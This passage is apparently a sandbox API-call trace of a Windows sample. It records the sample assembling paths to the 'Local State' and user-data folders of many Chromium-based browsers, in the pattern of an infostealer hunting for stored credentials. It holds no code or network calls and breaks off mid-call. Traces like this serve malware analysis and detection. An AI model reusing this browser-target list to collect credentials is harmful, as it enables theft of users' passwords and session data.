lpFindFileData=0x198330*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.797] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.797] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Vivaldi\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" [0174.797] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" [0174.797] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State" [0174.797] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\local state")) returned 0xffffffff [0174.797] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*") returned 55 [0174.797] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.798] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.799] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CocCoc\\Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" [0174.799] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" [0174.799] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State" [0174.799] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\local state")) returned 0xffffffff [0174.799] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*") returned 62 [0174.799] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.800] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.800] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\uCozMedia\\Uran\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" [0174.800] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" [0174.801] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State" [0174.801] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\local state")) returned 0xffffffff [0174.801] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*") returned 62 [0174.801] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.802] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.802] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\QIP Surf\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" [0174.802] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" [0174.802] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State" [0174.802] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\local state")) returned 0xffffffff [0174.802] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*") returned 56 [0174.802] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.803] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.804] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CentBrowser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" [0174.804] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" [0174.804] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State" [0174.804] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\local state")) returned 0xffffffff [0174.804] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*") returned 59 [0174.804] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x5c0061, ftCreationTime.dwLowDateTime=0x6f004c, ftCreationTime.dwHighDateTime=0x610063, ftLastAccessTime.dwLowDateTime=0x20006c, ftLastAccessTime.dwHighDateTime=0x740053, ftLastWriteTime.dwLowDateTime=0x740061, ftLastWriteTime.dwHighDateTime=0x65, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.805] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.805] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Elements Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" [0174.805] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" [0174.805] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State" [0174.805] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\local state")) returned 0xffffffff [0174.805] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*") returned 64 [0174.805] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.807] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.807] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\TorBro\\Profile" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" [0174.807] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" [0174.807] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State" [0174.809] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torbro\\profile\\local state")) returned 0xffffffff [0174.809] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\*") returned 52 [0174.809] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torbro\\profile\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x530020, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x650074, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.811] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.811] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CryptoTab Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" [0174.811] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" [0174.811] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State" [0174.811] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\local state")) returned 0xffffffff [0174.811] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*") returned 65 [0174.811] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x720065, ftCreationTime.dwLowDateTime=0x440020, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x5c0061, ftLastAccessTime.dwHighDateTime=0x6f004c, ftLastWriteTime.dwLowDateTime=0x610063, ftLastWriteTime.dwHighDateTime=0x20006c, nFileSizeHigh=0x740053, nFileSizeLow=0x740061, dwReserved0=0x65, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.812] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.812] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\BraveSoftware\\Brave-Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" [0174.812] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" [0174.812] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" [0174.813] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data\\local state")) returned 0xffffffff [0174.813] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*") returned 75 [0174.813] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x720042, ftCreationTime.dwLowDateTime=0x77006f, ftCreationTime.dwHighDateTime=0x650073, ftLastAccessTime.dwLowDateTime=0x5c0072, ftLastAccessTime.dwHighDateTime=0x730055, ftLastWriteTime.dwLowDateTime=0x720065, ftLastWriteTime.dwHighDateTime=0x440020, nFileSizeHigh=0x740061, nFileSizeLow=0x5c0061, dwReserved0=0x6f004c, dwReserved1=0x610063, cFileName="l", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.814] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.816] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0174.816] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0174.816] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" [0174.816] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable\\local state")) returned 0xffffffff [0174.816] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*") returned 68 [0174.816] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610072, ftCreationTime.dwLowDateTime=0x530020, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x6c0062, ftLastAccessTime.dwHighDateTime=0x5c0065, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.816] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.816] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0174.816] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0174.817] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" [0174.817] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera gx stable\\local state")) returned 0xffffffff [0174.817] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*") returned 71 [0174.817] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera gx stable\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610072, ftCreationTime.dwLowDateTime=0x470020, ftCreationTime.dwHighDateTime=0x200058, ftLastAccessTime.dwLowDateTime=0x740053, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x65006c, ftLastWriteTime.dwHighDateTime=0x4c005c, nFileSizeHigh=0x63006f, nFileSizeLow=0x6c0061, dwReserved0=0x530020, dwReserved1=0x610074, cFileName="t", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.817] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.817] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Opera Software\\Opera Neon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" [0174.817] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" [0174.817] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State" [0174.817] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State" (normalized: 